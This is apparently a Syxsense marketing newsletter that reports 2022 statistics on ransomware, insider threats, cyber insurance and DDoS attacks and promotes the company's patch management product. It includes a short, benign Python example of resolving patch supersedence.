Many wait with bated breath to see if their winning ticket comes up in Powerball. A recent jackpot exceeded a billion dollars. But cybercriminals look for a different kind of winning ticket – holding organizations to ransom. In the U.S. alone, banks processed $1.2 billion in ransomware payments in 2021, according to a report from the Treasury Department's Financial Crimes Enforcement Network. That's almost triple the amount from 2020 and the total could be even higher in 2022. With a war happening in Ukraine and Russia under heavy sanctions, the fact that much of this money flows to suspected Russia-based groups means that some of that cash may be subsidizing the Russian military. Stopping ransomware in its tracks, therefore, is a matter of national as well as organizational security.

Who is making the biggest payments? The manufacturing industry leads the way, with the average ransom payment being around $2 million, according to a Sophos study. These businesses probably considered that amount to be a modest penalty in comparison to the millions they would lose each week by having their systems shut down. This may be one of the reasons why manufacturing ransom averages are more than double that of the broader business world. Cyber criminals know this. They want to target companies that incur big daily losses due to a ransom attack. Manufacturers not only fit the profile; they are also laggards when it comes to security and digital transformation. Many of them cling to aging and highly insecure systems. And with the worlds of IT and operational technology (OT) coming together, ancient OT systems are now heavily exposed.  

Overall industry averages show that 37% of those paying ransoms handed over more than $100,000. But as many as 8% paid $1 million or more to be given their decryption keys. Not surprisingly, almost two thirds of those paying failed to recover all their data.  

Insider Threats  

Ransomware is huge. But insider threats, too, are becoming a major issue. Kroll’s Q3 Threat Landscape: Insider Threat the Trojan Horse of 2022 report highlights the rise of insider threats in the enterprise. They accounted for 35% of all unauthorized access threat incidents.  

Further findings:  

  • A big increase in phishing, particularly via valid accounts 
  • More malware infections via USB 
  • A decrease in overall ransomware attacks as criminals focus on the most lucrative targets  
  • An increase in credential-stealing malware such as Ursnif, Vidar, and Raccoon 
  • A rise in attacks against professional services and manufacturing firms 
  • An increase in phishing attacks, specifically vishing and smishing attacks in which threat actors attempt to gain valuable personal information for financial gain through phone calls, voice altering software, text messages, and other tools. 

The Sad State of Government Security  

In light of these challenges, the federal government has taken major steps to safeguard its systems. Yet breaches continue and ransomware is running rampant.  

  • Between 2018 and October 2022, 330 individual ransomware attacks were carried out against US government organizations, potentially impacting more than 230 million people and costing an estimated $70 billion in downtime alone.
  • Ransomware amounts varied from $1,000 to $5.3 million 
  • Hackers demanded nearly $36.5 million (72 ransom amounts were revealed) 
  • Hackers received $5 million in payments from 27 of those 72 cases 
  • Ryuk, Sodinokibi, DoppelPaymer, and Conti were the most prolific ransomware groups (where the entity disclosed the group's name or the group claimed responsibility for the attack) 
  • Texas had the highest number of attacks (35) and the greatest number of people impacted (72.5 million), followed by Georgia with 25 attacks and 23.9 million people potentially affected. Making up the rest of the top five most affected states were California (19 attacks), Florida (18 attacks), and Pennsylvania (14 attacks)

Should We All Quit?  

In response to such alarming reports, it is no wonder that many cybersecurity executives are throwing their hands up in despair. Some want to quit altogether. A better solution is to bring in outside help. MSSPs can share the burden with enterprise IT and help solve the staffing and ransomware crises. Security duties such as vulnerability management, endpoint detection and response (EDR), backup and recovery, and even Security Operations Center (SOC) services can be handed off to MSSPs.

Syxsense offers managed security services for patch management, vulnerability management, and remediation. These services provide real-time, 24-hour security coverage.  Syxsense also offers an MSP/MSSP program with a world-class platform that features an orchestration and automation engine to scale business without adding costs. 

For more information visit www.Syxsense.com  


Cyber Insurance Rates Climb & Refusals Multiply


The insurance industry is in somewhat of a crisis. Home insurance rates have climbed. Providers are pulling out of the market in some parts of the country. Flood insurance, too, is a major issue. It is mandated in many coastal and floodplain areas, yet insurance carriers are often reluctant to write it due to the risk of high-volume payouts.

Similarly in cyber insurance, premiums are rising sharply. Some companies are even being told they don’t qualify (or no longer qualify). A survey by Delinea of 300 US-based IT decision makers revealed one of the reasons for the challenges many face in obtaining affordable cyber insurance: nearly 80% of companies have had to use their cyber insurance at least once already, and more than half have used it multiple times. 

40% said risk reduction was the main reason for applying for cyber insurance, while 33% of respondents said it was also due to requirements from executive management and boards of directors. Another 25% cited recent ransomware incidents as a primary decision driver. Other drivers behind applications for cyber insurance included business contract requirements (24%) and having suffered a data breach (17%).

The report also demonstrated that cyber insurance has now become ubiquitous. Many companies have leveraged coverage more than once. That’s one of the reasons why the insurers are becoming more hesitant and choosier. They are covering less, asking for more, and making it more difficult for companies to receive comprehensive coverage. Only 30% of organizations confirmed their policies covered critical risks such as ransomware, ransom negotiation, and decisions on ransom payment. About 48% indicated their policy covered data recovery. A third said it covered incident response, regulatory fines, and third-party damages. 

Tough Requirements  

The report highlighted the fact that insurers are getting tougher to please. More and more, they require organizations to implement a broader set of security controls. By forcing organizations to adopt tougher layers of security, they seek to reduce the number of customers needing payouts from their cyber-policies. 51% said their insurer required that they implement cybersecurity awareness training and another 47% were required to have malware protection, antivirus software, multi-factor authentication (MFA), and to comprehensively backup their data. 42% had to acquire Privileged Access Management solutions to meet cyber-insurance requirements.  


Although about 93% of applicants are approved for coverage, the number receiving comprehensive coverage for everything has dwindled sharply. Gone are the days when insurers happily signed off on wide-ranging coverage. They got burned too much by surges in the number of claims following the latest widely exploited vulnerability, such as Log4j, or the latest rash of ransomware outbreaks. That's one of the big reasons why 75% of respondents said that their cyber-premiums increased at their last renewal.

Not only were their monthly payments hiked up, but they also faced far greater scrutiny from potential insurers. They wanted to know every detail of their security posture, their risk profile, and areas of potential vulnerability. Some of this was used as grounds for refusal of cyber insurance. In other cases, these assessments by insurers led to demands to implement a variety of different security tools.  

Any prospective cyber insurance policy holder, and anyone coming up for renewal, therefore, is advised to carefully assess their security basics before applying. Things like lack of comprehensive backup, inadequate patch management, and a lack of vulnerability management tools could form immediate grounds for refusal.  

Get ahead of the game by implementing Syxsense Enterprise. It provides automated tools to help meet the standards required by cyber insurance providers. It offers access to real-time data and device monitoring so security personnel have access to live, accurate information on the existing security picture, potential vulnerabilities, the state of patch management, mobile device security, and more. It helps IT to keep BYOD and company-issued devices secure from threats in remote, hybrid, or roaming work models. And it provides a way to enforce security standards, install and delete applications, set auto update policies, deploy patches automatically, and remotely lock, reset, and wipe mobile devices. It also helps satisfy underwriter demands for higher levels of automation in the enterprise before they approve new cyber insurance policies.  

Why face steeper premiums or even cyber insurance rejection? Implement Syxsense Enterprise today.  

For more information visit www.Syxsense.com  


DDoS Eclipses Ransomware as a Major Threat


A recent Threat Pulse research report from NCC Group found that the highest number of Distributed Denial of Service (DDoS) incidents between January and September 2022 took place in the month of September. This represented a 14% increase and a total of 2,090 DDoS attacks. Ransomware attacks, meanwhile, were down 7% from the previous month with Lockbit 3.0 (30%), Black Basta (13.3%), and BlackCat (12.8%) remaining the most prevalent threat actors. Lockbit has been the most active group for every month of the year.  

Sector-wise, all areas experienced a high volume of attacks. But Industrials (34%) were the most attacked vertical, followed by Consumer Cyclicals (18%), Healthcare (10%), and Technology (8.5%). The geographical distribution of attacks showed no surprises: North America suffered 84 attacks (45%), making it the most targeted region. Europe was next with 27%, then Asia with 14%. 

Interestingly, ransomware attacks overall were found to be 50% lower than a year before. It seems likely, therefore that 2021 will remain the highest year on record – unless there is an unprecedented upsurge in ransomware to end the year.  

Shift of Tactics  

Make no mistake. Ransomware remains a potent threat. But stepped-up law enforcement efforts, better international legal collaboration, and organizations deploying a raft of ransomware protection solutions probably combined to lessen its impact.  

The bad guys may be criminals, but they are not fools. They know what is going on. Thus, they have adjusted their tactics by increasing the volume of DDoS and launching more targeted ransomware campaigns. More than likely, 2021 was a freak year. Due to the success of ransomware in 2020, just about everyone among the cybercriminal gangs decided to get in on the act. Entire cybercrime supply chains formed up to facilitate ransomware. Lots of little outfits would probe enterprises for weaknesses. They would get a finder’s fee for passing on the details of a ripe target. More organized groups would then execute the ransomware attack and seek to collect the funds. Ransomware as a Service, too, emerged. Criminal developers created kits that could be sold to people with little or no computing experience. These developers got a cut of every successful extortion scheme.  

But the unprecedented funds raised through ransomware led to a glut in the market in 2021. Hence the downturn in 2022. That doesn't mean ransomware will go away. It is expected to remain an important part of the cybercrime toolkit for some time to come. But stronger defences against it mean that the bad guys will turn to tried and tested means of breaking into enterprise IT systems.

They will scan networks looking for server, website, operating system (OS) and application vulnerabilities. They will scour the web for unpatched systems. When they find them, they will exploit them relentlessly. Bad actors know that items on the Common Vulnerabilities and Exposures (CVE) list remain weak spots in many organizations. Despite these threats being publicized broadly and patches and remediation steps being clearly laid out, a great many organizations fail to act. There are many cases on record of vulnerabilities remaining unremedied years after the issuance of a patch. We have known about Log4j, for example, for a year now, yet it is still being exploited. Similarly, the Heartbleed vulnerability in OpenSSL (CVE-2014-0160) from 2014 remains something the bad guys can exploit in some businesses.

Syxsense Protection 

Syxsense Enterprise offers comprehensive vulnerability management, remediation, and patch management. It intelligently distributes patches with the click of a button without tying up bandwidth across the enterprise. It does this automatically, using technology that is designed to send software and patches across the wire once, using peer-to-peer within the network for local distribution.  

Further features include:  

  • Patch supersedence addresses the fact that vendors often roll older updates into newer cumulative patches. If a company deploys patches in the order they were released, it can spend time installing an old patch that a newer, higher-priority patch already includes. The patch supersedence feature of Syxsense deploys the newer patch and skips the one it supersedes.
  • Patch Roll Back: The last thing you want is for an update to cause incompatibilities in other systems. That’s why software vendors and IT departments conduct testing to ensure patches are benign. But despite the precautions, faulty patches can occasionally happen. Syxsense includes a patch roll back feature that allows you to return your systems to the state that existed before the implementation of the new patch.  
  • Testing and release within three hours: Hackers and cybercriminals move fast. There is no time to lose in installing patches. Within three hours of a patch being released, Syxsense has tested it, validated it, and has it ready for distribution.
  • Automation: With hundreds or even thousands of endpoints to manage, manual patch distribution is too slow. Syxsense is fully automated to ensure critical patches are implemented right away. There is no need to formulate scripts, hop from one screen to another, or manually push out patches to various destinations.  
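As an added example of the supersedence logic described above (illustrative code, not Syxsense's implementation), the resolver below takes a catalog of patches, each listing the patches it supersedes, follows the chains transitively, and returns the minimal set to deploy together with the reason each skipped patch was skipped. The catalog and its KB-style identifiers are constructed for illustration.

```python
# Constructed catalog (illustrative identifiers, not real vendor KB numbers):
# each patch maps to the patches it supersedes.
CATALOG = {
    "KB5001": [],           # oldest cumulative update
    "KB5002": ["KB5001"],   # rolls KB5001 into a newer cumulative update
    "KB5003": ["KB5002"],   # rolls up KB5002, and so transitively KB5001
    "KB5010": [],           # unrelated patch for a different product
}


def resolve_deployment(catalog, installed=frozenset()):
    """Decide what to push to an endpoint.

    catalog:   {patch_id: iterable of patch_ids it supersedes}
    installed: patch_ids already present on the endpoint
    Returns (deploy, skipped): the set of patch_ids to deploy and a mapping from
    each skipped patch_id to the reason it was skipped."""
    superseded_by = {}
    for newer, olders in catalog.items():
        for older in olders:
            superseded_by[older] = newer  # assumes one direct successor per patch

    def chain(pid):
        """Follow supersedence from pid to the newest catalog entry, guarding against cycles."""
        out = [pid]
        while (pid in superseded_by
               and superseded_by[pid] in catalog
               and superseded_by[pid] not in out):
            pid = superseded_by[pid]
            out.append(pid)
        return out

    deploy, skipped = set(), {}
    for pid in catalog:
        ch = chain(pid)
        # An installed patch anywhere up the chain already contains this one.
        covered = next((p for p in ch if p in installed), None)
        if covered == pid:
            skipped[pid] = "already installed"
        elif covered is not None:
            skipped[pid] = f"covered by installed {covered}"
        elif ch[-1] != pid:
            skipped[pid] = f"superseded by {ch[-1]}"
        else:
            deploy.add(pid)
    return deploy, skipped


if __name__ == "__main__":
    to_deploy, why_skipped = resolve_deployment(CATALOG, installed={"KB5010"})
    print("deploy:", sorted(to_deploy))
    for patch, reason in sorted(why_skipped.items()):
        print(f"skip {patch}: {reason}")
```

Note that a patch installed mid-chain only excuses the older patches beneath it: the newest member of the chain is still deployed, because it carries fixes the installed one does not.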

For more information, visit www.syxsense.com
